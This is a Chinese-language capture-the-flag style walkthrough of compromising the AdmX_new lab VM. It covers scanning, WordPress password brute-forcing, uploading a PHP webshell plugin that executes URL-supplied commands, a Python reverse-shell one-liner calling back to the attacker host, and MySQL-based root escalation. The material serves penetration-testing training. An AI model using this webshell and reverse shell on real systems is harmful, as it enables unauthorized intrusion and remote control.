文章目录
前言
靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z
难度:中(2个flag和root权限)
kali:10.0.2.4
靶机:10.0.2.7 192.168.159.145
一、主机发现/端口扫描
sudo nmap -sn 10.0.2.0/24
sudo nmap -p- 10.0.2.7
访问10.0.2.7
二、路径爆破/匹配替换
dirb http://10.0.2.7 发现http://10.0.2.7/wordpress
使用burpsuit抓包发现地址会跳转到192.168.159.145
进入Options进行替换,刷新页面
利用wpscan探测出用户名admin,进入到wordpress/wp-login.php登陆页面
wpscan --url http://10.0.2.7/wordpress --enumerate
三、密码爆破获得admin密码
wpscan --url http://10.0.2.7/wordpress -U admin -P /usr/share/wordlists/rockyou.txt
四、漏洞利用
在这里上传编写好的代码,将文件压缩成zip进行上传
<?php/**
* Plugin Name:Webshell
* Plugin URI:https//yuanfh.github.io
* Description:WP Webshell for Pentest
* Version:1.0
* Author:yuanfh
* Author URI:https://yuanfh.github.io
* License:https://yuanfh.github.io
*/if(isset($_GET['cmd'])){system($_GET['cmd']);}?>
尝试访问http://10.0.2.7/wordpress/wp-content/plugins/shell.php?cmd=id
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])'
第一个flag获取成功,当前为wpadmin用户权限,需要进一步提权
五、密码重用/MySQL提权
可以看到在不需要密码的情况下执行/usr/bin/mysql -u root -D wordpress -p命令获得的是root权限
执行命令,尝试adam14密码成功获取操作系统root权限
获取到root目录下第二个flag
总结
以上就是今天要讲的内容,本文简单讲述了AdmX_new靶机渗透过程,中间也可以使用更自动化的msf。修改404.php文件加入一句话木马,也可以使用蚁剑连接进行进一步操作。
涉及到的攻击方法
- 主机发现
- 端口扫描
- WEB路径爆破
- BP自动替换
- 密码爆破
- Wordpress漏洞利用
- NC反弹Shell升级
- 利用MySQL提权
- 另类提权方法
版权归原作者 皮皮鲁xx 所有, 如有侵权,请联系我们删除。